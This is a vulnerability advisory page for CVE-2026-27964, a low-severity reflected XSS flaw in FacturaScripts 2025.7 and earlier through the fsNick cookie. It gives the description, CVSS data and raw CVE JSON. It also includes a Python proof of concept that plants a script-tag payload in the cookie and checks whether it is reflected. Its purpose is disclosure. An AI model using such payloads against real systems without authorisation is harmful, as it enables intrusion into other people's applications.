Security Vulnerability Report
中文
CVE-2026-27964 CVSS 3.9 LOW

CVE-2026-27964

Published: 2026-05-18 22:16:39
Last Modified: 2026-05-19 14:44:43
Source: [email protected]

Description

FacturaScripts is an open source accounting and invoicing software. Versions 2025.7 and prior contain a Reflected Cross-Site Scripting (XSS) vulnerability through the fsNick cookie parameter. The application reflects the cookie's value directly into the HTML without sanitization. The fsNick cookie is rendered into the DOM without encoding. While the server does reject the modified session and forces a logout, the HTML containing the payload reaches the browser first. This lets the script execute immediately upon load, effectively beating the redirect. This issue has been fixed in version 2025.8.

CVSS Details

CVSS Score
3.9
Severity
LOW
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

FacturaScripts <= 2025.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests target_url = "http://target-facturascripts-url" # The malicious payload to be executed via XSS xss_payload = "<script>alert('CVE-2026-27964 XSS');</script>" # Create a session to manage cookies session = requests.Session() # Set the vulnerable 'fsNick' cookie with the payload # In a real scenario, this cookie might be set via JavaScript or client-side manipulation session.cookies.set('fsNick', xss_payload) try: # Send the request to the target response = session.get(target_url) # Check if the payload is reflected in the response body if xss_payload in response.text: print("[+] Vulnerability Confirmed: The payload was reflected in the response.") print("[+] If executed in a browser, the script would run before the redirect.") else: print("[-] Vulnerability Not Detected or Patched.") except Exception as e: print(f"Error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-27964", "sourceIdentifier": "[email protected]", "published": "2026-05-18T22:16:38.703", "lastModified": "2026-05-19T14:44:43.127", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "FacturaScripts is an open source accounting and invoicing software. Versions 2025.7 and prior contain a Reflected Cross-Site Scripting (XSS) vulnerability through the fsNick cookie parameter. The application reflects the cookie's value directly into the HTML without sanitization. The fsNick cookie is rendered into the DOM without encoding. While the server does reject the modified session and forces a logout, the HTML containing the payload reaches the browser first. This lets the script execute immediately upon load, effectively beating the redirect. This issue has been fixed in version 2025.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "baseScore": 3.9, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/NeoRazorX/facturascripts/commit/9066e10326029adf012114e27eb5f3f33f78ecfd", "source": "[email protected]"}, {"url": "https://github.com/NeoRazorX/facturascripts/security/advisories/GHSA-gq5c-rw37-g46c", "source": "[email protected]"}, {"url": "https://github.com/NeoRazorX/facturascripts/security/advisories/GHSA-gq5c-rw37-g46c", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.